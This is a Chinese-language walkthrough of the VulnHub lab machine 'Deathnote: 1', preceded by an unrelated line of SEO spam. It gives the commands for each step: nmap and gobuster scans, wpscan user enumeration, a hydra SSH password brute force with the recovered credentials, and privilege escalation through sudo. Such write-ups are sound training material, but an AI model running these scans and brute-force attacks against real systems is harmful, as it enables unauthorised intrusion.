网站的劣势,自己做的网站出现左右滑动条,什么网站发布找做效果图的,全国代运营最好的公司Deathnote: 1 来自 Deathnote: 1 ~ VulnHub 1#xff0c;将两台虚拟机网络连接都改为NAT模式 2#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.128#xff0c;靶场IP192.168.23.129 3#xff0c;对靶机进行端口… Deathnote: 1 来自 Deathnote: 1 ~ VulnHub 1将两台虚拟机网络连接都改为NAT模式 2攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.128靶场IP192.168.23.129 3对靶机进行端口服务探测 nmap -sV -T4 -p- -A 192.168.23.129 4访问80端口开放的http服务 那么就需要我修改域名解析文件 echo 192.168.23.129 deathnote.vuln /etc/hosts 域名解析成功 http://deathnote.vuln/wordpress/ 再扫描枚举网站子目录 gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403 再扫描识别其指纹特征 典型的wordpress CMS建站 5然后拿wpscan进行专项扫描 wpscan --url http://deathnote.vuln/wordpress/ -e u 得到一个用户名。还是回到网站子目录枚举 http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/ 下载这两个文本作为密码本 wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt hydra -L user.txt -P notes.txt ssh://192.168.23.129 l/death4me 6然后再尝试ssh登录 ssh l192.168.23.129 得到flag 对加密内容进行解密 Brainfuck/OoK加密解密 - Bugku CTF平台 然后信息收集一下 在/opt/下发现一个L 的目录对其中一串十六进制字符转码 得到一个密码kiraisevilwpscan扫描的时候扫出来一个kira用户 7尝试切换到kira用户 得到第二个flag sudo -l看一下提权操作 这种提权操作最简单 sudo su 提权成功得到flag